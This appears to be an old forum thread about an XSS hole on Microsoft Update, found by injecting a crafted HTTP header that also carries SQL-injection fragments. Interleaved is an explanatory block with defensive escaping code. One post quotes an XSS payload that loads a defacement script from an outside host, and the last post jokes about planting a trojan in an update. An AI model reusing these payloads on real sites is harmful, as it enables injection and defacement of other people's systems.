Author | Post

theblacksheep
Hi, I was looking for some updates and so I visited the microsoft.com web site. As you might know, I always fake my HTTP headers in such a way that they are likely to create SQL errors when used unfiltered in SQL statements.

For example, my browser:
Shadow("><script type="text/javascript>alert('hello');</script><"'UNION/*)

Then just go to microsoft.com and visit the link "Microsoft Update".

Quote from Microsoft:
<"'UNION/*)".toLowerCase();
var g_sDisableWGACheck = "false";
var g_sWGACOAReturnValues ="0,6-Success;1,7,8,9,10-ErrPage1;2-ErrPage2;3-ErrPage3;4,5-ErrPage4";
var g_bWGAEnablePingback = true;
var g_sWGAMinVersion = "1,3,254,0";
var conLangCode = "en";
var g_sQSProductName = '';

I just wanted to tell you about this.

theblacksheep

Edited by theblacksheep on 02.01.2006 11:53:00
02.01.2006 10:44:41

mxn
Neat discovery, check out the source if there is some HTML or just plaintext.

02.01.2006 13:22:45

quangntenemy
I think it's just an XSS bug.

Quote:
test";</script></head><body><script src="http://www.freewebs.com/quangntenemy/xssdefaced.js"></script></body></html>

02.01.2006 13:29:05
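
The output quoted in this thread is consistent with a request header being pasted unescaped into a JavaScript string inside an inline script. The following is an added example, not part of the thread and not Microsoft's code: it assumes the page was built by string concatenation, and the names renderUnsafe, renderSafe, escapeForInlineScript and g_sUA, as well as the sample header, are hypothetical.

```javascript
// Added example: header value placed in an inline <script> string, unsafe vs. escaped.

// Unsafe: the header text is pasted straight into a JavaScript string literal.
function renderUnsafe(userAgent) {
  return '<script>var g_sUA = "' + userAgent + '".toLowerCase();</script>';
}

// Escape for a JS string literal that sits inside an HTML <script> element.
// Every character outside a small allowlist becomes \uXXXX, so quotes,
// backslashes, "<", ">", "/" and line terminators can end neither the
// string literal nor the script element.
function escapeForInlineScript(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._-]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Safe: same template, but the header goes through the escaper first.
function renderSafe(userAgent) {
  return '<script>var g_sUA = "' + escapeForInlineScript(userAgent) +
    '".toLowerCase();</script>';
}

// Counts closing script tags; a template with one <script> block must yield 1.
function closingScriptTags(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Recovers the original value from the escaped literal without eval:
// \uXXXX escapes and the allowlisted characters are also valid JSON.
function decodeLiteral(escaped) {
  return JSON.parse('"' + escaped + '"');
}

// Constructed sample header (harmless markup, same shape as the quoted output).
const sampleUA = 'Mozilla/5.0 test";</script><i>injected</i>';

console.log(renderUnsafe(sampleUA)); // header ends the string and the element
console.log(renderSafe(sampleUA));   // header stays inside the string literal
console.log(closingScriptTags(renderUnsafe(sampleUA)),
            closingScriptTags(renderSafe(sampleUA)));
```

A quick review check for templates like this is to send a header containing a double quote and a closing script tag and confirm the response still has exactly one closing tag per script block.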

theblacksheep
Here it goes: Source code of default.aspx

Maybe it is really just an XSS bug.

@all BlackHats: Time to prepare a Windows update with a trojan in it

Edited by theblacksheep on 02.01.2006 13:37:48
02.01.2006 13:30:43